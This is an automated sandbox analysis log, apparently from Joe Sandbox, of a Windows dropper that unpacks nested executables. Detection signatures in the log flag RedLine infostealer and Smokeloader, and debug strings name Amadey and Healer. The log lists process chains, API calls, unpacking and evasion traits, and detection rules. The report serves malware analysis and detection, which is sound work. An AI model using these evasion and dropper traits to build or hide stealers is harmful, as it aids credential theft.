Source: 00000009.00000002.316668372.0000000002E26000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.341440182.0000000006880000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en239906.exe, type: DROPPED	Matched rule: Detects RedLine infostealer Author: ditekSHen

Source: SzznpUhIjo.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9.2.con1165.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.con1165.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.con1165.exe.2da0e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.3.kino5628.exe.4776220.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.3.kino5628.exe.4776220.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.3.con1165.exe.4510000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000009.00000003.291817431.0000000004510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.341685333.0000000006A30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000009.00000002.316668372.0000000002E26000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.341440182.0000000006880000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en239906.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Code function: 0_2_00401F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	0_2_00401F90
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Code function: 1_2_008E1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	1_2_008E1F90
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	Code function: 2_2_00E51F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	2_2_00E51F90
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	Code function: 3_2_010D1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	3_2_010D1F90

Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Code function: 0_2_00403BA2	0_2_00403BA2
Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Code function: 0_2_00405C9E	0_2_00405C9E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Code function: 1_2_008E3BA2	1_2_008E3BA2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Code function: 1_2_008E5C9E	1_2_008E5C9E
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	Code function: 2_2_00E53BA2	2_2_00E53BA2
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	Code function: 2_2_00E55C9E	2_2_00E55C9E
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	Code function: 3_2_010D3BA2	3_2_010D3BA2
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	Code function: 3_2_010D5C9E	3_2_010D5C9E
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_00408C60	9_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_0040DC11	9_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_00407C3F	9_2_00407C3F
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_00418CCC	9_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_00406CA0	9_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_004028B0	9_2_004028B0
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_0041A4BE	9_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_00418244	9_2_00418244
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_00401650	9_2_00401650
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_00402F20	9_2_00402F20
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_004193C4	9_2_004193C4
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_00418788	9_2_00418788
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_00402F89	9_2_00402F89
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_00402B90	9_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_004073A0	9_2_004073A0
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DA2B17	9_2_02DA2B17
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DA18B7	9_2_02DA18B7
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DA786D	9_2_02DA786D
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DA31F0	9_2_02DA31F0
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DB89EF	9_2_02DB89EF
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DA3187	9_2_02DA3187
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DA8EC7	9_2_02DA8EC7
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DA7EA6	9_2_02DA7EA6
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DADE78	9_2_02DADE78
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DA77D9	9_2_02DA77D9
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DA6F07	9_2_02DA6F07
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DB8F33	9_2_02DB8F33
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DBA725	9_2_02DBA725
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DB84AB	9_2_02DB84AB
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DA2DF7	9_2_02DA2DF7

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: String function: 02DAE43F appears 44 times

Source: kino5628.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 724274 bytes, 2 files, at 0x2c +A "kino6423.exe" +A "en239906.exe", ID 1904, number 1, 28 datablocks, 0x1503 compression
Source: kino6423.exe.1.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 578750 bytes, 2 files, at 0x2c +A "kino4801.exe" +A "dNT35s70.exe", ID 1958, number 1, 25 datablocks, 0x1503 compression
Source: kino4801.exe.2.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 205326 bytes, 2 files, at 0x2c +A "bus7600.exe" +A "con1165.exe", ID 1796, number 1, 11 datablocks, 0x1503 compression
Source: kino4801.exe.2.dr	Static PE information: Resource name: RT_RCDATA type: 370 sysV pure executable not stripped

Source: SzznpUhIjo.exe	Binary or memory string: OriginalFilename vs SzznpUhIjo.exe
Source: SzznpUhIjo.exe, 00000000.00000003.255438944.0000000006E80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs SzznpUhIjo.exe

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge280443.exe 319B22945BEEB7424FE6DB1E9953AD5F2DC12CBBA2FE24E599C3DEDA678893BB

Source: SzznpUhIjo.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dNT35s70.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: con1165.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SzznpUhIjo.exe	ReversingLabs: Detection: 43%
Source: SzznpUhIjo.exe	Virustotal: Detection: 49%

Source: SzznpUhIjo.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SzznpUhIjo.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SzznpUhIjo.exe C:\Users\user\Desktop\SzznpUhIjo.exe
Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Jump to behavior

Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Code function: 0_2_00401F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	0_2_00401F90
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Code function: 1_2_008E1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	1_2_008E1F90
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	Code function: 2_2_00E51F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	2_2_00E51F90
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	Code function: 3_2_010D1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	3_2_010D1F90

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\bus7600.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\SzznpUhIjo.exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP

Jump to behavior

Source: classification engine

Classification label: mal93.troj.spyw.evad.winEXE@15/10@0/0

Source: C:\Users\user\Desktop\SzznpUhIjo.exe

Code function: 0_2_0040597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,

0_2_0040597D

Source: C:\Users\user\Desktop\SzznpUhIjo.exe

0_2_0040597D

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe

Code function: 4_2_00007FFBACD21B10 ChangeServiceConfigA,

4_2_00007FFBACD21B10

Source: C:\Users\user\Desktop\SzznpUhIjo.exe

Code function: 0_2_068807C6 CreateToolhelp32Snapshot,Module32First,

0_2_068807C6

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\

Source: C:\Users\user\Desktop\SzznpUhIjo.exe

Code function: 0_2_00404FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,

0_2_00404FE0

Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Command line argument: Kernel32.dll	0_2_00402BFB
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Command line argument: Kernel32.dll	1_2_008E2BFB
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	Command line argument: Kernel32.dll	2_2_00E52BFB
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	Command line argument: Kernel32.dll	3_2_010D2BFB
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Command line argument: 08A	9_2_00413780

Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: SzznpUhIjo.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: C:\Users\user\Desktop\SzznpUhIjo.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: SzznpUhIjo.exe

Static file information: File size 1238528 > 1048576

Source: SzznpUhIjo.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x109200

Source: SzznpUhIjo.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SzznpUhIjo.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SzznpUhIjo.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SzznpUhIjo.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SzznpUhIjo.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SzznpUhIjo.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SzznpUhIjo.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\lar\megeheyubosed.pdb source: kino6423.exe, 00000002.00000003.257898884.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, dNT35s70.exe.2.dr
Source:	Binary string: wextract.pdb source: SzznpUhIjo.exe, SzznpUhIjo.exe, 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, SzznpUhIjo.exe, 00000000.00000003.255438944.0000000006E80000.00000004.00000020.00020000.00000000.sdmp, kino5628.exe, kino5628.exe, 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, kino5628.exe, 00000001.00000003.256675819.00000000046C5000.00000004.00000020.00020000.00000000.sdmp, kino6423.exe, kino6423.exe, 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, kino6423.exe, 00000002.00000003.257898884.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, kino4801.exe, kino4801.exe, 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, kino6423.exe.1.dr, kino5628.exe.0.dr, kino4801.exe.2.dr
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: SzznpUhIjo.exe, 00000000.00000003.256081932.0000000004EFC000.00000004.00000020.00020000.00000000.sdmp, SzznpUhIjo.exe, 00000000.00000003.255438944.0000000006E80000.00000004.00000020.00020000.00000000.sdmp, ge280443.exe.0.dr
Source:	Binary string: Healer.pdb source: con1165.exe, 00000009.00000003.292100697.0000000002E86000.00000004.00000020.00020000.00000000.sdmp, con1165.exe, 00000009.00000002.317635484.0000000004620000.00000004.08000000.00040000.00000000.sdmp, con1165.exe, 00000009.00000002.318010465.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, con1165.exe, 00000009.00000002.317671404.0000000004650000.00000004.00000020.00020000.00000000.sdmp, con1165.exe, 00000009.00000002.317938178.0000000004950000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wextract.pdbGCTL source: SzznpUhIjo.exe, 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, SzznpUhIjo.exe, 00000000.00000003.255438944.0000000006E80000.00000004.00000020.00020000.00000000.sdmp, kino5628.exe, 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, kino5628.exe, 00000001.00000003.256675819.00000000046C5000.00000004.00000020.00020000.00000000.sdmp, kino6423.exe, 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, kino6423.exe, 00000002.00000003.257898884.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, kino4801.exe, 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, kino6423.exe.1.dr, kino5628.exe.0.dr, kino4801.exe.2.dr
Source:	Binary string: PC:\lar\megeheyubosed.pdb source: kino6423.exe, 00000002.00000003.257898884.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, dNT35s70.exe.2.dr
Source:	Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: kino4801.exe, 00000003.00000003.258987124.0000000004AC6000.00000004.00000020.00020000.00000000.sdmp, bus7600.exe, 00000004.00000000.259206423.0000000000822000.00000002.00000001.01000000.00000007.sdmp, bus7600.exe.3.dr
Source:	Binary string: XAC:\zavexuji\kixufefaginuye\9-kotegusaw 37\rihipivolov.pdb source: kino4801.exe, 00000003.00000003.258987124.0000000004AC6000.00000004.00000020.00020000.00000000.sdmp, con1165.exe, 00000009.00000000.290825680.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, con1165.exe.3.dr
Source:	Binary string: _.pdb source: con1165.exe, 00000009.00000003.292100697.0000000002E86000.00000004.00000020.00020000.00000000.sdmp, con1165.exe, 00000009.00000002.317635484.0000000004620000.00000004.08000000.00040000.00000000.sdmp, con1165.exe, 00000009.00000002.318010465.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, con1165.exe, 00000009.00000002.317671404.0000000004650000.00000004.00000020.00020000.00000000.sdmp, con1165.exe, 00000009.00000003.293865027.0000000002E98000.00000004.00000020.00020000.00000000.sdmp, con1165.exe, 00000009.00000002.316698493.0000000002E98000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\zen\nuheweca.pdb source: SzznpUhIjo.exe
Source:	Binary string: Healer.pdbH5 source: con1165.exe, 00000009.00000003.292100697.0000000002E86000.00000004.00000020.00020000.00000000.sdmp, con1165.exe, 00000009.00000002.317635484.0000000004620000.00000004.08000000.00040000.00000000.sdmp, con1165.exe, 00000009.00000002.318010465.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, con1165.exe, 00000009.00000002.317671404.0000000004650000.00000004.00000020.00020000.00000000.sdmp, con1165.exe, 00000009.00000002.317938178.0000000004950000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\zavexuji\kixufefaginuye\9-kotegusaw 37\rihipivolov.pdb source: kino4801.exe, 00000003.00000003.258987124.0000000004AC6000.00000004.00000020.00020000.00000000.sdmp, con1165.exe, 00000009.00000000.290825680.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, con1165.exe.3.dr

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Unpacked PE file: 0.2.SzznpUhIjo.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Unpacked PE file: 9.2.con1165.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Unpacked PE file: 0.2.SzznpUhIjo.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.data:W;.idata:R;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Unpacked PE file: 9.2.con1165.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Code function: 0_2_0040724D push ecx; ret	0_2_00407260
Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Code function: 0_2_06881E94 pushad ; retf	0_2_06881E95
Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Code function: 0_2_068838D3 push cs; ret	0_2_068838D4
Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Code function: 0_2_06881F0B push FFFFFF8Bh; ret	0_2_06881F0D
Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Code function: 0_2_06885624 pushfd ; ret	0_2_06885625
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Code function: 1_2_008E724D push ecx; ret	1_2_008E7260
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	Code function: 2_2_00E5724D push ecx; ret	2_2_00E57260
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	Code function: 3_2_010D724D push ecx; ret	3_2_010D7260
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_0041C40C push cs; iretd	9_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_00423149 push eax; ret	9_2_00423179
